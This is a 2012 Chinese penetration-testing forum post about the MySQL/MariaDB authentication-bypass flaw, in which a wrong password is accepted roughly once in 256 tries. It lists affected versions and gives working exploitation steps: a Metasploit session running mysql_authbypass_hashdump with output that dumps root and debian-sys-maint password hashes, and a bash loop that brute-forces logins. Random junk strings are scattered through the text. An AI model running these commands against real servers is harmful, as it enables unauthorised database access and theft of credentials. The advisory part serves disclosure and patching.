中国网络渗透测试联盟

标题: mysql任意用户密码概率登陆漏洞 [打印本页]

作者: admin    时间: 2012-12-20 20:11
标题: mysql任意用户密码概率登陆漏洞
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。
( M0 l, x2 {* @5 ?; M4 Q7 U
1 d) t$ p% L; L! F也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现。
1 l$ K% n9 P! Y+ Y  t
7 _+ E0 v; j6 u7 E0 h/ S( v+ @) [受影响的产品:* e8 D, o, S/ g% Z
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are
) `* }  r# V6 Zvulnerable.
  a! t6 `  N6 [& R* E$ ZMariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.6 ^: O6 H$ k' s+ Y, G
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
8 {# a. H$ h; o9 v. Q# h, X7 o& |7 }! Q7 R! R
验证方法:* u( }* r; P3 j' P

: a2 b/ i9 t7 |- {  g1 Y$ msfconsole msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1 msf auxiliary(mysql_authbypass_hashdump) > run [+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test [*] 127.0.0.1:3306 Authentication bypass is 10% complete [*] 127.0.0.1:3306 Authentication bypass is 20% complete [*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts [+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes… [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89 [*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
$ |! A/ w  p) n2 s7 [+ h1 |4 z6 f) [7 ]7 ^! R
$ for i in `seq 1 1000`; do mysql -u root –password=bad -h 127.0.0.1 2>/dev/null; done mysql>  o9 J, {, D" N" \. M





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2